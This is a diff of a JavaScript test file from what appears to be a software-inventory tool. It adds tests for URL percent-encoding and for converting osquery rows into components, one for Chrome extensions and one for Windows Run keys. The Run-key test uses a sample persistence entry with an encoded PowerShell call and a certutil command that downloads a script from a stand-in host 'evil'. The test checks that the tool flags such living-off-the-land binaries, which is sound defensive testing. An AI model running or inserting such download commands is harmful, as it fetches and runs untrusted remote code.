+  ["http://example.com/path%ab%cd%0Z", false], // Invalid: %0Z ('Z' is not a hex digit)
+  ["http://example.com/path%abc", true], // Valid: %ab is a complete encoding, 'c' is the next literal character
+  ["http://example.com/path%abZ", true], // Valid %ab followed by a literal character
   // Test with extremely long, but valid, percent-encoded sequence (pushes validateIri/URL)
   // This string is valid UTF-8 percent-encoded 'A' repeated many times.
   // encodeURIComponent("A".repeat(10000)) produces a very long string of %41
@@ -8648,3 +9385,63 @@ it("parses valid minified js with real package name (#2717)", async () => {
 
   if (existsSync(file)) unlinkSync(file);
 });
+
+describe("convertOSQueryResults", () => {
+  it("should use identifier as package name for chrome-extension purl type", () => {
+    const components = convertOSQueryResults(
+      "chrome_extensions",
+      {
+        purlType: "chrome-extension",
+        componentType: "application",
+      },
+      [
+        {
+          name: "Human Readable Name",
+          identifier: "HLEPFOOHEGKHHMJIEOECHADDAEJAOKHF",
+          version: "25.7.1",
+          profile: "Default",
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    assert.strictEqual(components[0].name, "hlepfoohegkhhmjieoechaddaejaokhf");
+    assert.strictEqual(
+      components[0].purl,
+      "pkg:chrome-extension/hlepfoohegkhhmjieoechaddaejaokhf@25.7.1",
+    );
+    const propNames = components[0].properties.map((prop) => prop.name);
+    assert.ok(propNames.includes("name"));
+    assert.ok(propNames.includes("identifier"));
+  });
+
+  it("should add LOLBAS properties to suspicious windows osquery rows", () => {
+    const components = convertOSQueryResults(
+      "windows_run_keys",
+      {
+        purlType: "swid",
+        componentType: "data",
+      },
+      [
+        {
+          name: "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
+          description:
+            "powershell -enc AAAA; certutil.exe -urlcache -f https://evil/p.ps1 p.ps1",
+        },
+      ],
+      false,
+    );
+    assert.strictEqual(components.length, 1);
+    const propertyMap = Object.fromEntries(
+      components[0].properties.map((property) => [
+        property.name,
+        property.value,
+      ]),
+    );
+    assert.strictEqual(propertyMap["cdx:lolbas:matched"], "true");
+    assert.ok(propertyMap["cdx:lolbas:names"].includes("powershell.exe"));
+    assert.ok(propertyMap["cdx:lolbas:names"].includes("certutil.exe"));
+    assert.ok(propertyMap["cdx:lolbas:functions"].includes("download"));
+    assert.ok(propertyMap["cdx:lolbas:attackTechniques"].includes("T1059.001"));
+  });
+});